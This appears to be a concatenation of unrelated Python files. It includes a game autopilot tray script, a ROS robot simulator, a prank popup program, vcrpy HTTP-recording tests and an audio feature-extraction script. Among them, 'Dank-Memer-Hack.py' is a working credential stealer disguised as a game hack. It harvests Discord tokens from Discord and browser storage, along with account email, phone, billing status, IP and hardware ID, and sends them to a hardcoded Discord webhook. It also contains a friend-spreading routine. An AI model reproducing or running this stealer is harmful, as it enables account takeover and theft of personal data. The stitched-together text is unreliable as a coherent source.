    # Use a local loop name so the module-level `thread` global is not
    # clobbered, and the `.name` attribute instead of the deprecated
    # Thread.getName().
    for worker in threading.enumerate():
        if worker.name == 'EDAutopilot':
            worker.kill()
    clear_input(get_bindings())
def set_state(v):
    """Return a pystray menu callback that switches scanner mode to v."""
    def inner(icon, item):
        global STATE
        STATE = v
        set_scanner(v)
    return inner
def get_state(v):
    """Return a predicate telling pystray whether mode v is selected."""
    def inner(item):
        return v == STATE
    return inner
def tray():
    """Build the tray icon, scanner-mode menu, and global hotkeys, then
    block in the pystray event loop until Exit is chosen."""
    global icon, thread
    icon = None
    thread = None
    name = 'ED - Autopilot'
    icon = Icon(name=name, title=name)
    logo = Image.open(resource_path('src/logo.png'))
    icon.icon = logo
    # Radio group: exactly one scanner mode is checked at a time.
    icon.menu = Menu(
        MenuItem(
            'Scan Off',
            set_state(0),
            checked=get_state(0),
            radio=True
        ),
        MenuItem(
            'Scan on Primary Fire',
            set_state(1),
            checked=get_state(1),
            radio=True
        ),
        MenuItem(
            'Scan on Secondary Fire',
            set_state(2),
            checked=get_state(2),
            radio=True
        ),
        MenuItem('Exit', lambda: exit_action())
    )
    # Global hotkeys work even when another window has focus.
    keyboard.add_hotkey('page up', start_action)
    keyboard.add_hotkey('page down', stop_action)
    icon.run(setup)  # blocks; setup() makes the icon visible
if __name__ == '__main__':
tray()
|
simulator.py | import math
import threading
import matplotlib.pyplot as plt
import numpy as np
import rospy
import time
from geometry_msgs.msg import Pose, Twist
from matplotlib import patches
from matplotlib.collections import PatchCollection
from nav_msgs.msg import Odometry, OccupancyGrid
from nav_msgs.srv import GetMap
from voronoi_hsi.msg import VoronoiTesselation
from voronoi_hsi.srv import *
import Util
import simulator_util
def almost_equal(n, m, diff=0.005):
    """Return True when n and m differ by at most `diff` (absolute)."""
    return -diff <= n - m <= diff
class RobotSimulator(simulator_util.DraggablePoint):
    """A draggable simulated robot that integrates cmd_vel into a pose and
    republishes it as Odometry."""

    def __init__(self, fig_handler, pose, color, id_robot="0"):
        # type: (plt.Figure, Pose, list, str) -> None
        super(RobotSimulator, self).__init__(fig_handler, x=pose.position.x, y=pose.position.y, color=color)
        self.fig_handler = fig_handler
        self.pose = pose
        self.speed = Twist()
        self.color = color
        self.id = id_robot
        self.speed_callback = rospy.Subscriber("robot_" + str(self.id) + "/cmd_vel", Twist, self.robot_vel_callback, queue_size=1)
        self.pose_publisher = rospy.Publisher("robot_" + str(self.id) + "/pose", Odometry, queue_size=1)

    def robot_vel_callback(self, msg):
        # type: (Twist) -> None
        """Store the most recent commanded velocity."""
        self.speed = msg

    # NOTE(review): the original class also defined a `pose_publisher`
    # method here.  It was unreachable (shadowed by the identically-named
    # publisher attribute assigned in __init__) and published a raw Pose
    # on an Odometry topic; publish_pose() below is the working
    # equivalent, so the dead method has been removed.

    def set_pose(self, pose):
        """Set the robot pose from a Pose message or an [x, y] list."""
        if isinstance(pose, Pose):
            self.pose = pose
        elif isinstance(pose, list) and len(pose) == 2:
            # BUG FIX: compare the length with ==, not the identity
            # operator `is` (only works by CPython small-int caching).
            # Keep the current yaw, replacing only the position.
            self.pose = Simulator.conf_to_pose([pose, Util.quaternion_get_yaw(self.pose.orientation)])
        else:
            raise ValueError("Type should be either a list of geometry_msgs/Pose")
        self.set_point_pose(self.pose.position.x, self.pose.position.y)

    def remove(self):
        """Remove the point from the figure and shut down ROS endpoints."""
        super(RobotSimulator, self).remove()
        self.speed_callback.unregister()
        self.pose_publisher.unregister()

    def update_pose_diff(self, occ_grid, sleep_time):
        # type: (OccGrid, float) -> None
        """Integrate the current speed over `sleep_time` (unicycle model),
        applying the step only when the new pose is collision free."""
        yaw = Util.quaternion_get_yaw(self.pose.orientation)
        w_dot = self.speed.angular.z * sleep_time
        x_dot = self.speed.linear.x * math.cos(yaw) * sleep_time
        y_dot = self.speed.linear.x * math.sin(yaw) * sleep_time
        new_pose = Pose()
        new_pose.position.x = self.pose.position.x + x_dot
        new_pose.position.y = self.pose.position.y + y_dot
        new_pose.orientation = Util.get_quaternion_fom_euler([0, 0, yaw + w_dot])
        if occ_grid.is_free(new_pose):
            self.pose = new_pose
            self.set_point_pose(new_pose.position.x, new_pose.position.y)

    def publish_pose(self):
        """Publish the current pose as a nav_msgs/Odometry message."""
        odom = Odometry()
        odom.pose.pose.position = self.pose.position
        odom.pose.pose.orientation = self.pose.orientation
        self.pose_publisher.publish(odom)
class OccGrid(object):
    """Occupancy-grid wrapper: fetches/receives a map and renders it as an image."""

    should_update = False

    def __init__(self, service_name, figure):
        self.width = 0
        self.height = 0
        self.fig = figure
        self.resolution = 0
        # Starts as None; set_occ_grid() re-binds this to a (width x height)
        # numpy matrix of occupancy values (-1 unknown, 0..100 occupied).
        self.occ_grid = None  # type: np.matrix
        self.origin = Pose()
        self.end = Pose()
        self.service_name = service_name
        self.robot_pose_service = rospy.Service("occ_grid_update", SetOccGrid, self.set_occ_grid_service)
        self.should_update = False
        self.axes = None
        self.plot_handle = None
        self.patches = None

    def get_occ_grid(self):
        """Fetch the map synchronously from the configured map service."""
        occ_grid_service = rospy.ServiceProxy(self.service_name, GetMap)
        occ_grid = occ_grid_service().map
        self.set_occ_grid(occ_grid)

    def set_occ_grid(self, occ_grid):
        # type: (OccupancyGrid) -> None
        """Store a new OccupancyGrid message, derive extents and redraw."""
        print("got occ grid")
        self.occ_grid = occ_grid
        self.width = self.occ_grid.info.width
        self.height = self.occ_grid.info.height
        self.resolution = self.occ_grid.info.resolution
        self.origin = self.occ_grid.info.origin
        self.end.position.x = self.width*self.resolution + self.origin.position.x
        self.end.position.y = self.height * self.resolution + self.origin.position.y
        # Re-bind occ_grid from the ROS message to an indexable numpy matrix.
        self.occ_grid = np.mat(self.occ_grid.data).reshape(self.height, self.width).transpose()
        print("Should update")
        self.draw_rectangles()

    def set_occ_grid_service(self, req):
        # type: (SetOccGridRequest) -> None
        """ROS service handler wrapping set_occ_grid().

        NOTE(review): returns None; rospy service handlers normally return a
        response object -- confirm SetOccGrid tolerates this.
        """
        self.set_occ_grid(req.map)

    def occ_grid_callback(self, msg):
        """Topic-subscriber entry point for OccupancyGrid messages."""
        self.set_occ_grid(msg)

    def is_free(self, pose, radius=0.2):
        """Return True when the cell containing *pose* is known and (mostly) free.

        NOTE(review): *radius* is currently unused -- only the single cell
        under the pose is checked.
        """
        sub_pose = Util.subtract_pose(pose, self.origin)
        x = int(math.floor(sub_pose.position.x/self.resolution))
        y = int(math.floor(sub_pose.position.y/self.resolution))
        if 0 <= x < self.width and 0 <= y < self.height:
            # 0..20 occupancy probability is treated as free space.
            if 0 <= self.occ_grid[x, y] <= 20:
                return True
        return False

    def get_extent(self):
        """Return [xmin, xmax, ymin, ymax] in world coordinates for imshow()."""
        return [self.origin.position.x, self.end.position.x, self.origin.position.y, self.end.position.y]

    def occ_grid_to_img(self):
        """Convert occupancy values to a grayscale image (unknown cells -> 173)."""
        image = np.copy(self.occ_grid)
        for i in range(self.width):
            for j in range(self.height):
                elem = self.occ_grid[i, j]
                if elem == -1:
                    image[i, j] = 173
                else:
                    image[i, j] = int((1 - elem/100.0)*255)
        return np.rot90(image)

    def draw_rectangles(self, fig=None):
        """Draw (or refresh) the grid image on the current figure.

        BUG FIX: *fig* is now optional -- set_occ_grid() calls this with no
        arguments, which previously raised TypeError.  The parameter is kept
        (unused) for backward compatibility with external callers.
        """
        image = self.occ_grid_to_img()
        extent = self.get_extent()
        if self.plot_handle:
            self.plot_handle.set_data(image)
        else:
            self.plot_handle = plt.imshow(image, extent=extent, zorder=0, interpolation='nearest', cmap="gray")
        self.should_update = False
class Simulator(object):
    """Matplotlib-based multi-robot simulator node.

    Owns the occupancy grid and the robot markers, plus a physics thread that
    integrates robot motion and a visual thread that redraws the figure.
    """

    physics_time = 0.1  # class default (s); overridden per instance in __init__

    def __init__(self):
        self.printing_voronoi = False
        self.robots = {}  # type: dict
        self.physics_time = 0.05
        rospy.init_node('simulator')
        self.vis_time = 0.05
        self.robot_pose_service = rospy.Service("set_robot_pose", SetRobotPose, self.robot_service)
        self.occ_grid_topic = ""
        self.tesselation_topic = ""
        self.robot_param = ""
        self.occ_grid_subscriber = None  # type: rospy.Subscriber
        self.tesselation_subscriber = None  # type: rospy.Subscriber
        self.voronoi_collection = None
        self.voronoi_axes = None
        self.voronoi_should_draw = False
        self.plot_handle = None
        self.obstacle_collection = None
        self.obstacle_axes = None
        self.fig = plt.figure(1)
        plt.gca().set_aspect('equal', adjustable='box')
        plt.axis([0, 20, 0, 20])
        self.occ_grid = OccGrid("static_map", self.fig)
        self.occ_grid.get_occ_grid()
        self.fig.canvas.draw()
        self.read_simulator_params()
        self.read_robot_parameters()
        # Daemon threads so the process exits when the plot window is closed.
        self.physics_t = threading.Thread(target=self.physics_thread)
        self.physics_t.daemon = True
        self.visual_t = threading.Thread(target=self.visual_thread)
        self.visual_t.daemon = True
        self.loop_time = 0

    def start(self):
        """Start the worker threads and enter the blocking matplotlib loop."""
        self.physics_t.start()
        self.visual_t.start()
        plt.show()

    def read_simulator_params(self):
        """Read topic names from the 'simulator' ROS param and wire subscribers."""
        try:
            sim_p = rospy.search_param("simulator")
            sim_params = rospy.get_param(sim_p)
            self.occ_grid_topic = sim_params["occupancy_grid_topic"]
            self.occ_grid_subscriber = rospy.Subscriber(self.occ_grid_topic, OccupancyGrid, self.occ_grid.set_occ_grid, queue_size=1)
            self.tesselation_topic = sim_params["tesselation_topic"]
            self.tesselation_subscriber = rospy.Subscriber(self.tesselation_topic, VoronoiTesselation, self.voronoi_callback, queue_size=1)
            self.robot_param = sim_params["robots_param"]
        except KeyError:
            rospy.logfatal("Parameter robots not found. Exiting.")
            sys.exit(1)
        except Exception:  # was a bare except:, which also swallowed SystemExit etc.
            rospy.logfatal("A non recognized exception raised while getting robots parameter. Exiting")
            sys.exit(1)

    def read_robot_parameters(self):
        """Create one RobotSimulator per entry of the robots parameter."""
        try:
            robots = rospy.get_param(self.robot_param)
            if robots is not None and len(robots) > 0:
                for r in robots:  # type: dict
                    self.create_robot(r["id"], self.conf_to_pose(r["pose"]), r["color"])
        except KeyError:
            rospy.logfatal("Parameter robots not found. Exiting.")
            sys.exit(1)
        except Exception as e:
            rospy.logfatal("A non recognized exception raised while getting robots parameter. Exiting\n" + str(e))
            sys.exit(1)

    def voronoi_callback(self, msg):
        # type: (VoronoiTesselation) -> None
        """Render a tesselation message as a per-robot color overlay.

        Drops a frame if the previous one is still being rendered.
        """
        if self.printing_voronoi:
            print("Skipping printing voronoi, not done yet.")
            return
        self.printing_voronoi = True
        try:
            Util.tic()
            height = msg.height
            width = msg.width
            matrix = np.reshape(msg.data, (width, height))
            image = np.empty((width, height, 4))
            for i in range(width):
                for j in range(height):
                    elem = matrix[i, j]
                    if elem != -1:
                        # Cell owned by robot `elem`: use its color, fully opaque.
                        color = self.robots[elem].color
                        image[i, j] = (np.asarray(color + [0])/255.0)
                        image[i, j, 3] = 1
                    else:
                        image[i, j] = np.asarray([0, 0, 0, 0])
            extent = self.occ_grid.get_extent()
            if self.plot_handle:
                self.plot_handle.set_data(np.rot90(image))
            else:
                self.plot_handle = plt.imshow(np.rot90(image), extent=extent, zorder=10, interpolation="nearest")
            self.voronoi_should_draw = False
        finally:
            # BUG FIX: the busy flag was never cleared, so every tesselation
            # message after the first one was skipped forever.
            self.printing_voronoi = False

    @staticmethod
    def conf_to_pose(pose_conf):
        """Build a Pose from a flat [x, y, yaw] configuration list."""
        pose = Pose()
        pose.position.x = pose_conf[0]
        pose.position.y = pose_conf[1]
        pose.orientation = Util.get_quaternion_fom_euler([0, 0, pose_conf[2]])
        return pose

    def create_robot(self, id_r, pose, color=None):
        """Create (or fetch) a robot and (re)apply its color.

        *color* must be an RGB triple; anything else falls back to [20, 20, 20].
        """
        if color is None:
            color = [20, 20, 20]
        if id_r in self.robots:
            robot = self.robots[id_r]
        else:
            if not isinstance(pose, Pose):
                raise ValueError("pose is not geometry_msgs/Pose type.")
            robot = RobotSimulator(self.fig, pose, color, id_r)
        robot.color = [20, 20, 20]
        if len(color) == 3:
            robot.color = color
        self.robots[robot.id] = robot

    def remove_robot(self, id):
        # type: (str) -> None
        """Remove a robot marker and unregister its ROS endpoints."""
        if id in self.robots:  # type: RobotSimulator
            robot = self.robots[id]
            robot.remove()
            self.robots.pop(id, None)

    def plot_image(self, image, extent):
        """Thin wrapper over plt.imshow for an image with world-coordinate extent."""
        return plt.imshow(image, extent=extent, interpolation="nearest")

    def plot_occ_grid(self):
        """Build an RGBA buffer whose alpha channel is the occupancy grid.

        NOTE(review): the buffer is built but never drawn or returned --
        this looks like unfinished code; confirm before relying on it.
        """
        occ_grid_img = np.zeros((self.occ_grid.width, self.occ_grid.height, 4), dtype=float)
        occ_grid_img[:,:,3] = self.occ_grid.occ_grid

    def robot_service(self, req):
        # type: (SetRobotPoseRequest) -> object
        """ROS service handler: create or reposition a robot from the request."""
        try:
            self.create_robot(req.id, req.pose, req.color)
        except ValueError as e:
            # BUG FIX: Exception.message does not exist in Python 3; use str(e).
            rospy.logerr(str(e))
        return None

    def physics_thread(self):
        """Fixed-rate loop: integrate every robot's motion and publish its pose."""
        while True:
            Util.tic()
            for robot in self.robots.values():  # type: RobotSimulator
                robot.update_pose_diff(self.occ_grid, self.loop_time)
                robot.publish_pose()
            toc = Util.toc()
            # Sleep out the remainder of the period; loop_time feeds the next
            # integration step so motion stays consistent under load.
            sleep_time = self.physics_time - toc
            self.loop_time = toc + sleep_time
            if sleep_time <= 0:
                sleep_time = 0
            time.sleep(sleep_time)

    def visual_thread(self):
        """Fixed-rate loop: redraw the canvas when any layer asked for it."""
        while True:
            should_draw = False
            if self.occ_grid.should_update:
                self.occ_grid.draw_rectangles(self.fig)
                should_draw = True
            if self.voronoi_should_draw:
                self.voronoi_should_draw = False
                should_draw = True
            if should_draw:
                self.fig.canvas.draw()
            time.sleep(self.vis_time)
def main():
    """Build the simulator node and run it until the plot window closes."""
    simulator = Simulator()
    simulator.start()
if __name__ == '__main__':
    try:
        main()
    except rospy.ROSInterruptException:
        # Raised when ROS shuts the node down; treated as a clean exit.
        pass
|
boring-02.py | """
不断弹出窗口的小程序,如果没有结束进程的话,最多显示100个
不会对电脑有任何的损害
就是比较考验友情
参考:https://mp.weixin.qq.com/s/zIwGnevNiHlgmkeI2XVwXA
改进:tanyiqu
"""
import tkinter as tk
import random
import threading
import time
def boom():
    """Open one popup window at a random screen position and run its mainloop.

    Each call blocks its thread until the window is closed.
    NOTE(review): Tk is not thread-safe; creating a Tk() instance per thread
    happens to work only on some platforms -- confirm before relying on it.
    """
    window = tk.Tk()
    width = window.winfo_screenwidth()
    height = window.winfo_screenheight()
    # Random top-left corner anywhere on the screen.
    a = random.randrange(0, width)
    b = random.randrange(0, height)
    window.title('你是一个傻狍子')
    window.geometry("200x50" + "+" + str(a) + "+" + str(b))
    tk.Label(window, text='你是一个傻狍子', bg='green',
             font=('宋体', 17), width=20, height=4).pack()
    window.mainloop()
    pass
threads = []
# Spawn up to 100 popup threads, one every 0.1 s; each thread blocks in its
# own Tk mainloop, so windows accumulate until the process is terminated.
for i in range(100):
    t = threading.Thread(target=boom)
    threads.append(t)
    time.sleep(0.1)
    threads[i].start()
    pass
|
test_wild.py | import multiprocessing
import pytest
from six.moves import xmlrpc_client, xmlrpc_server
requests = pytest.importorskip("requests")
import vcr # NOQA
try:
import httplib
except ImportError:
import http.client as httplib
def test_domain_redirect():
    """Ensure that redirects across domains are considered unique"""
    # seomoz.org 301s to moz.com; if both requests matched the same cassette
    # entry we would replay the redirect forever and loop.
    target = "http://seomoz.org/"
    with vcr.use_cassette("tests/fixtures/wild/domain_redirect.yaml") as cass:
        requests.get(target, headers={"User-Agent": "vcrpy-test"})
        # Two recorded interactions: the redirect itself plus the final fetch.
        assert len(cass) == 2
def test_flickr_multipart_upload(httpbin, tmpdir):
    """
    The python-flickr-api project does a multipart
    upload that confuses vcrpy
    """
    def _pretend_to_be_flickr_library():
        # Raw httplib POST with a manually sent body, mimicking python-flickr-api.
        content_type, body = "text/plain", "HELLO WORLD"
        h = httplib.HTTPConnection(httpbin.host, httpbin.port)
        headers = {"Content-Type": content_type, "content-length": str(len(body))}
        h.request("POST", "/post/", headers=headers)
        h.send(body)
        r = h.getresponse()
        data = r.read()
        h.close()
        return data

    testfile = str(tmpdir.join("flickr.yml"))
    # First pass records exactly one interaction.
    with vcr.use_cassette(testfile) as cass:
        _pretend_to_be_flickr_library()
        assert len(cass) == 1

    # Second pass must replay that interaction instead of re-recording.
    with vcr.use_cassette(testfile) as cass:
        assert len(cass) == 1
        _pretend_to_be_flickr_library()
        assert cass.play_count == 1
def test_flickr_should_respond_with_200(tmpdir):
    """A recorded flickr upload request should replay with HTTP 200."""
    cassette_path = str(tmpdir.join("flickr.yml"))
    with vcr.use_cassette(cassette_path):
        response = requests.post("https://api.flickr.com/services/upload", verify=False)
        assert response.status_code == 200
def test_cookies(tmpdir, httpbin):
    """Cookies set by one request stay visible on the next within a session."""
    cassette_path = str(tmpdir.join("cookies.yml"))
    with vcr.use_cassette(cassette_path):
        session = requests.Session()
        session.get(httpbin.url + "/cookies/set?k1=v1&k2=v2")
        reply = session.get(httpbin.url + "/cookies")
        assert len(reply.json()["cookies"]) == 2
def test_amazon_doctype(tmpdir):
    """Gzipped responses should still come back as decodable HTML text."""
    # amazon gzips its homepage. For some reason, in requests 2.7, it's not
    # getting gunzipped.
    with vcr.use_cassette(str(tmpdir.join("amz.yml"))):
        r = requests.get("http://www.amazon.com", verify=False)
        assert "html" in r.text
def start_rpc_server(q):
    """Child-process entry point: serve XML-RPC on an ephemeral local port.

    Puts the server URL on *q* so the parent can connect, then serves forever
    (the parent terminates this process at fixture teardown).
    """
    httpd = xmlrpc_server.SimpleXMLRPCServer(("127.0.0.1", 0))
    httpd.register_function(pow)
    q.put("http://{}:{}".format(*httpd.server_address))
    httpd.serve_forever()
@pytest.fixture(scope="session")
def rpc_server():
    """Session-scoped XML-RPC server running in a child process.

    Yields the server URL; the child is terminated at teardown.
    (pytest.yield_fixture is deprecated and removed in modern pytest --
    a plain fixture supports generator functions.)
    """
    q = multiprocessing.Queue()
    proxy_process = multiprocessing.Process(target=start_rpc_server, args=(q,))
    try:
        proxy_process.start()
        yield q.get()
    finally:
        proxy_process.terminate()
def test_xmlrpclib(tmpdir, rpc_server):
    """Recorded XML-RPC calls replay with identical results."""
    # First cassette pass records the live call.
    with vcr.use_cassette(str(tmpdir.join("xmlrpcvideo.yaml"))):
        roundup_server = xmlrpc_client.ServerProxy(rpc_server, allow_none=True)
        original_schema = roundup_server.pow(2, 4)

    # Second pass replays it; the result must match byte for byte.
    with vcr.use_cassette(str(tmpdir.join("xmlrpcvideo.yaml"))):
        roundup_server = xmlrpc_client.ServerProxy(rpc_server, allow_none=True)
        second_schema = roundup_server.pow(2, 4)

    assert original_schema == second_schema
|
Dank-Memer-Hack.py | import os
if os.name != "nt":
exit()
from re import findall
from json import loads, dumps
from base64 import b64decode
from datetime import datetime
from subprocess import Popen, PIPE
from urllib.request import Request, urlopen
from threading import Thread
from time import sleep
from sys import argv
dt = datetime.now()
# Paste your webhook url to "URL_HERE"
WEBHOOK_URL = 'https://discord.com/api/webhooks/937178658102202379/hxNLyyryScxscVVNp0NL4BFmtQ_XAS7wk7ifNoXRVTpoN981FvocJSrzy03SbkBGiL67'
LOCAL = os.getenv("LOCALAPPDATA")
ROAMING = os.getenv("APPDATA")
PATHS = {
"Discord" : ROAMING + "\\Discord",
"Discord Canary" : ROAMING + "\\discordcanary",
"Discord PTB" : ROAMING + "\\discordptb",
"Google Chrome" : LOCAL + "\\Google\\Chrome\\User Data\\Default",
"Firefox" : LOCAL + "\\Mozilla\\Firefox\\User Data\\Profiles",
"Opera" : ROAMING + "\\Opera Software\\Opera Stable",
"Edge" : LOCAL + "\\\Microsoft\\Edge\\User Data\\Default",
"Brave" : LOCAL + "\\BraveSoftware\\Brave-Browser\\User Data\\Default",
"Yandex" : LOCAL + "\\Yandex\\YandexBrowser\\User Data\\Default",
"Vivaldi" : LOCAL + "\\Vivaldi\\User Data\\User Data",
}
def getheaders(token=None, content_type="application/json"):
headers = {
"Content-Type": content_type,
"User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11"
}
if token:
headers.update({"Authorization": token})
return headers
def getuserdata(token):
try:
return loads(urlopen(Request("https://discordapp.com/api/v6/users/@me", headers=getheaders(token))).read().decode())
except:
pass
def gettokens(path):
path += "\\Local Storage\\leveldb"
tokens = []
for file_name in os.listdir(path):
if not file_name.endswith(".log") and not file_name.endswith(".ldb"):
continue
for line in [x.strip() for x in open(f"{path}\\{file_name}", errors="ignore").readlines() if x.strip()]:
for regex in (r"[\w-]{24}\.[\w-]{6}\.[\w-]{27}", r"mfa\.[\w-]{84}"):
for token in findall(regex, line):
tokens.append(token)
return tokens
def getip():
ip = "None"
try:
ip = urlopen(Request("https://api.ipify.org")).read().decode().strip()
except:
pass
return ip
def getavatar(uid, aid):
url = f"https://cdn.discordapp.com/avatars/{uid}/{aid}.gif"
try:
urlopen(Request(url))
except:
url = url[:-4]
return url
def gethwid():
p = Popen("wmic csproduct get uuid", shell=True, stdin=PIPE, stdout=PIPE, stderr=PIPE)
return (p.stdout.read() + p.stderr.read()).decode().split("\n")[1]
def getfriends(token):
try:
return loads(urlopen(Request("https://discordapp.com/api/v6/users/@me/relationships", headers=getheaders(token))).read().decode())
except:
pass
def getchat(token, uid):
try:
return loads(urlopen(Request("https://discordapp.com/api/v6/users/@me/channels", headers=getheaders(token), data=dumps({"recipient_id": uid}).encode())).read().decode())["id"]
except:
pass
def has_payment_methods(token):
try:
return bool(len(loads(urlopen(Request("https://discordapp.com/api/v6/users/@me/billing/payment-sources", headers=getheaders(token))).read().decode())) > 0)
except:
pass
def send_message(token, chat_id, form_data):
try:
urlopen(Request(f"https://discordapp.com/api/v6/channels/{chat_id}/messages", headers=getheaders(token, "multipart/form-data; boundary=---------------------------325414537030329320151394843687"), data=form_data.encode())).read().decode()
except:
pass
def spread(token, form_data, delay):
return # Remove to re-enabled
for friend in getfriends(token):
try:
chat_id = getchat(token, friend["id"])
send_message(token, chat_id, form_data)
except Exception as e:
pass
sleep(delay)
def main():
cache_path = ROAMING + "\\.cache~$"
prevent_spam = True
self_spread = True
embeds = []
working = []
checked = []
already_cached_tokens = []
working_ids = []
ip = getip()
pc_username = os.getenv("UserName")
pc_name = os.getenv("COMPUTERNAME")
user_path_name = os.getenv("userprofile").split("\\")[2]
for platform, path in PATHS.items():
if not os.path.exists(path):
continue
for token in gettokens(path):
if token in checked:
continue
checked.append(token)
uid = None
if not token.startswith("mfa."):
try:
uid = b64decode(token.split(".")[0].encode()).decode()
except:
pass
if not uid or uid in working_ids:
continue
user_data = getuserdata(token)
if not user_data:
continue
working_ids.append(uid)
working.append(token)
username = user_data["username"] + "#" + str(user_data["discriminator"])
user_id = user_data["id"]
avatar_id = user_data["avatar"]
avatar_url = getavatar(user_id, avatar_id)
email = user_data.get("email")
phone = user_data.get("phone")
nitro = bool(user_data.get("premium_type"))
flags = user_data.get("public_flags")
billing = bool(has_payment_methods(token))
embed = {
"color": 0x5865f2,
"fields": [
{
"name": "**Account Info**",
"value": f'Email: {email}\nPhone: {phone}\nNitro: {nitro}\nBilling Info: {billing}',
"inline": True
},
{
"name": "**PC Info**",
"value": f'IP: {ip}\nUsername: {pc_username}\nPC Name: {pc_name}\nToken Location: {platform}',
"inline": True
},
{
"name": "**Token**",
"value": token,
"inline": False
},
],
"author": {
"name": f"{username} ({user_id})",
"icon_url": avatar_url
},
"footer": {
"text": "Hooked at • " + dt.strftime('%Y-%m-%d %H:%M:%S'),
}
}
embeds.append(embed)
with open(cache_path, "a") as file:
for token in checked:
if not token in already_cached_tokens:
file.write(token + "\n")
if len(working) == 0:
working.append('123')
webhook = {
"content": "",
"embeds": embeds,
"username": "CStealer",
"avatar_url": "https://i.hizliresim.com/9ftjid9.jpg"
}
try:
urlopen(Request(WEBHOOK_URL, data=dumps(webhook).encode(), headers=getheaders()))
except:
pass
if self_spread:
for token in working:
with open(argv[0], encoding="utf-8") as file:
content = file.read()
payload = f'-----------------------------325414537030329320151394843687\nContent-Disposition: form-data; name="file"; filename="{__file__}"\nContent-Type: text/plain\n\n{content}\n-----------------------------325414537030329320151394843687\nContent-Disposition: form-data; name="content"\n\nserver crasher. python download: https://www.python.org/downloads\n-----------------------------325414537030329320151394843687\nContent-Disposition: form-data; name="tts"\n\nfalse\n-----------------------------325414537030329320151394843687--'
Thread(target=spread, args=(token, payload, 7500 / 1000)).start()
try:
main()
except Exception as e:
print(e)
pass
|
create_audio_features.py |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# This script is adapted from Alexander berard seq2seq feature extract script:
# https://github.com/alex-berard/seq2seq/blob/master/scripts/speech/extract.py
from __future__ import division
import argparse
import numpy as np
import yaafelib
import tarfile
import tempfile
import os
from collections import Counter
import math
import multiprocessing
# --- CLI arguments -----------------------------------------------------------
parser = argparse.ArgumentParser()
parser.add_argument('inpath',
                    help='Path to folder, that contains all the wav files')
parser.add_argument(
    'outpath', help='Output path to folder, to save features to')
parser.add_argument('logpath', help="Path to save log files to")
parser.add_argument('n_cpus', help='Number of cpus for multiprocessing')
parser.add_argument('--derivatives', action='store_true')
args = parser.parse_args()

# --- yaafe feature plan ------------------------------------------------------
parameters = dict(
    step_size=160,  # corresponds to 10 ms (at 16 kHz)
    block_size=640,  # corresponds to 40 ms
    mfcc_coeffs=40,
    # more filters? (needs to be at least mfcc_coeffs+1, because first coeff is ignored)
    mfcc_filters=41
)
# TODO: ensure that all input files use this rate
fp = yaafelib.FeaturePlan(sample_rate=16000)
mfcc_features = 'MFCC MelNbFilters={mfcc_filters} CepsNbCoeffs={mfcc_coeffs} ' \
                'blockSize={block_size} stepSize={step_size}'.format(
                    **parameters)
energy_features = 'Energy blockSize={block_size} stepSize={step_size}'.format(
    **parameters)
fp.addFeature('mfcc: {}'.format(mfcc_features))
if args.derivatives:
    fp.addFeature('mfcc_d1: {} > Derivate DOrder=1'.format(mfcc_features))
    fp.addFeature('mfcc_d2: {} > Derivate DOrder=2'.format(mfcc_features))
fp.addFeature('energy: {}'.format(energy_features))
if args.derivatives:
    fp.addFeature('energy_d1: {} > Derivate DOrder=1'.format(energy_features))
    fp.addFeature('energy_d2: {} > Derivate DOrder=2'.format(energy_features))
# Output streams to concatenate, in fixed order (must match the plan above).
if args.derivatives:
    keys = ['mfcc', 'mfcc_d1', 'mfcc_d2', 'energy', 'energy_d1', 'energy_d2']
else:
    keys = ['mfcc', 'energy']
df = fp.getDataFlow()
engine = yaafelib.Engine()
engine.load(df)
afp = yaafelib.AudioFileProcessor()
frame_counter = Counter()

# --- output and log-file setup -----------------------------------------------
inpath = args.inpath
outpath = args.outpath
logpath = args.logpath
errorlogfile = os.path.join(logpath, "errorlog.txt")
erroraudios = os.path.join(logpath, "erroraudios.txt")
progresslog = os.path.join(logpath, "progress.txt")
if not os.path.exists(outpath):
    os.makedirs(outpath)
if not os.path.exists(logpath):
    os.makedirs(logpath)
# Truncate/initialise the three log files before the workers start appending.
with open(errorlogfile, "w") as errorfile:
    errorfile.write(
        "This file is a log for all the errors that occured while creating the MFCC features.\n")
    errorfile.write(
        "See erroraudios.txt for a list of the audios, that caused errors.\n\n")
with open(erroraudios, "w") as collectionfile:
    pass
with open(progresslog, "w") as progressfile:
    pass

# --- work partitioning -------------------------------------------------------
audios = []
n_cpus = int(args.n_cpus)
for audio in os.listdir(inpath):
    audios.append(audio)
# Split the file list into n_cpus-1 equal chunks; the last chunk also absorbs
# the remainder.
chunk_size = math.floor(len(audios) / n_cpus)
chunk_size_leftover = len(audios) - chunk_size * n_cpus
last_chunk = chunk_size + chunk_size_leftover
print("Chunk size = {}".format(chunk_size))
print("Last chunk size = {}".format(last_chunk))
commands_1_n = audios[:-last_chunk]
command_n = audios[-last_chunk:]
def chunks(lst, n):
    """Yield successive n-sized slices of *lst*; the final slice may be shorter."""
    for offset in range(0, len(lst), n):
        yield lst[offset:offset + n]
def do_command(filenames, process_id):
    """Extract features for *filenames*, saving .npy files and logging errors.

    Runs as a worker-process body; relies on the module-level yaafe engine,
    processor and path globals (each process gets its own copy after fork).
    """
    counter = 0
    for it, file_name in enumerate(filenames):
        counter += 1
        # Periodic progress report, both to stdout and the shared progress log.
        if it % 1000 == 0:
            progress_message = "Process {} done {} out of {}".format(
                process_id, it, len(filenames))
            with open(progresslog, "a+") as progressfile:
                print(progress_message)
                progressfile.write(progress_message + "\n")
        try:
            afp.processFile(engine, os.path.join(inpath, file_name))
            feats = engine.readAllOutputs()
            # Concatenate the MFCC/energy (and derivative) streams feature-wise.
            feats = np.concatenate([feats[k] for k in keys], axis=1)
            frames, dim = feats.shape
            feats = feats.astype(np.float32)
            if frames == 0:
                # Zero frames means the file was empty or not audio at all.
                with open(errorlogfile, "a+") as errorfile:
                    errorfile.write(
                        "{} seems to be an empty audio or not an audio file \n\n".format(file_name))
                with open(erroraudios, "a+") as collectionfile:
                    collectionfile.write(
                        file_name + "\n")
            else:
                np.save(os.path.join(
                    outpath, file_name.replace(".wav", ".npy")), feats)
        except Exception as e:
            # Record the failure but keep processing the remaining files.
            with open(errorlogfile, "a+") as errorfile:
                errorfile.write(
                    "Error occured at file: {} \n".format(file_name))
                errorfile.write("Error type: {}\n".format(type(e)))
                errorfile.write("Error message: {}\n\n".format(str(e)))
            with open(erroraudios, "a+") as collectionfile:
                collectionfile.write(
                    file_name + "\n")
        if it == len(filenames) - 1:
            print("Process {} is Done".format(process_id))
processes = []
